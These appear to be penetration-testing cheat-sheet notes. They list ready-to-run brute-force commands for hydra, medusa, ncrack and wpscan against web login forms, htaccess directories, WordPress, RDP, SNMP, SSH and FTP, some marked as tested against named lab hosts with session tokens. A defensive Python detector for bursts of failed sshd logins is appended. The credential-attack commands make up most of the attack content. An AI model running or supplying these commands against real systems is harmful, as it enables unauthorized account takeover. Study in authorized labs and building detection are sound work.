Brute force networked services
- Use a prepared password file to brute force network services such as HTTP, SSH, FTP, ...
- Wordlist directories: /usr/share/wordlists or /usr/share/wordlists/metasploit (common-root.txt)
- Short one: /usr/share/wordlists/fasttrack.txt
- Long one: /usr/share/wordlists/rockyou.txt
Attack on htaccess protected web directory
medusa -h victim-ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10
Use BurpSuite to capture the POST request parameters (form field names, session cookie and the failure string) before building the hydra command:
- BurpSuite: https://github.com/lethanhtung01011980/Notes/wiki/Webapp-proxies
hydra -l admin -P /usr/share/wordlists/rockyou.txt victim-ip http-post-form "/backend/backend/auth/signin:_session_key=9QGD43r7Xdek5yh20YNcBLzVcHXxfaBKPNhnygC2&_token=R9TYkP5uOHhpGkojRqsHcdl2DIHqlCaficKdAjkm&postback=1&login=^USER^&password=^PASS^:F=Forgot"
(Tested) admin user:
hydra -l admin -P /usr/share/wordlists/rockyou.txt nineveh.htb http-post-form "/department/login.php:PHPSESSID=ephh03pnv3990cudqf5oev4g74&username=^USER^&password=^PASS^:F=Invalid"
PHP web:
hydra 10.10.10.43 -l user -P /usr/share/SecLists/Passwords/phpbb.txt https-post-form "/db/index.php:password=^PASS^&proc_login=true:Incorrect password"
(Tested) HTTPS, dummy admin user:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 https-post-form "/db/index.php:PHPSESSID=me12tsm6h51u63io3llqmhid16&password=^PASS^&remember=no&login=Log+In&proc_login=true:F=Incorrect"
Do 'non-intrusive' checks ...
wpscan -u http://victim-ip
Do wordlist password brute force on enumerated users using 50 threads ...
wpscan -u http://victim-ip --wordlist /usr/share/wordlists/rockyou.txt --threads 50
Do wordlist password brute force on the 'admin' username only ...
wpscan -u http://victim-ip --wordlist /usr/share/wordlists/rockyou.txt --username admin
Attack on Windows RDP
ncrack -vv --user offsec -P password-file.txt rdp://victim-ip
Attack on SNMP (the same form can be used for other protocols supported by hydra):
hydra -P password-file.txt -v victim-ip snmp
Attack on SSH
hydra -l root -P password-file.txt victim-ip ssh
- Single user and 10 threads:
medusa -h 10.11.1.116 -u root -P /usr/share/wordlists/rockyou.txt -M ftp -t 10
- Multiple users and passwords:
medusa -h 192.168.1.108 -U user.txt -P pass.txt -M ftp
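The threaded hydra/medusa runs above (SSH, FTP, HTTP forms) leave a characteristic trail on the target: a burst of failed logins from one source within a few seconds. As an added example that is not part of the original notes, the following detector flags that pattern in an sshd auth log with a per-source sliding window; the log excerpt, the IP addresses and the threshold/window values are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd auth.log excerpt: one source makes rapid failed attempts
# (the pattern a threaded hydra/medusa run leaves), another fails only once.
SAMPLE_AUTH_LOG = """\
Mar  3 10:15:01 host sshd[2101]: Failed password for root from 203.0.113.5 port 40001 ssh2
Mar  3 10:15:01 host sshd[2102]: Failed password for root from 203.0.113.5 port 40002 ssh2
Mar  3 10:15:02 host sshd[2103]: Failed password for invalid user admin from 203.0.113.5 port 40003 ssh2
Mar  3 10:15:02 host sshd[2104]: Failed password for root from 203.0.113.5 port 40004 ssh2
Mar  3 10:15:03 host sshd[2105]: Failed password for root from 203.0.113.5 port 40005 ssh2
Mar  3 10:15:40 host sshd[2106]: Failed password for alice from 198.51.100.7 port 51000 ssh2
Mar  3 10:15:45 host sshd[2107]: Accepted password for alice from 198.51.100.7 port 51001 ssh2
Mar  3 10:16:03 host sshd[2108]: Failed password for root from 203.0.113.5 port 40006 ssh2
"""

FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>[\d.]+) port \d+"
)

def parse_failures(log_text, year=2024):
    """Yield (timestamp, source_ip, username) for every failed sshd login.
    syslog lines carry no year, so one is assumed (constructed value)."""
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["src"], m["user"]

def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Return {source_ip: (first_ts, failure_count, usernames)} for each source
    that reaches `threshold` failures inside a `window_seconds` sliding window."""
    recent = defaultdict(deque)   # src -> failure timestamps still in the window
    users = defaultdict(set)      # src -> usernames tried (sprayed vs single)
    alerts = {}
    for ts, src, user in parse_failures(log_text):
        q = recent[src]
        q.append(ts)
        users[src].add(user)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()           # drop failures that fell out of the window
        if len(q) >= threshold and src not in alerts:
            alerts[src] = (q[0], len(q), sorted(users[src]))
    return alerts

if __name__ == "__main__":
    for src, (first, count, names) in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(f"ALERT {src}: {count} failures since {first:%H:%M:%S}, users={names}")
```

On the constructed excerpt only 203.0.113.5 is reported; the single failure from 198.51.100.7 followed by a successful login stays below the threshold. The same window logic applies to web-server access logs for the http-post-form attacks above, keyed on source IP and POSTs to the login path.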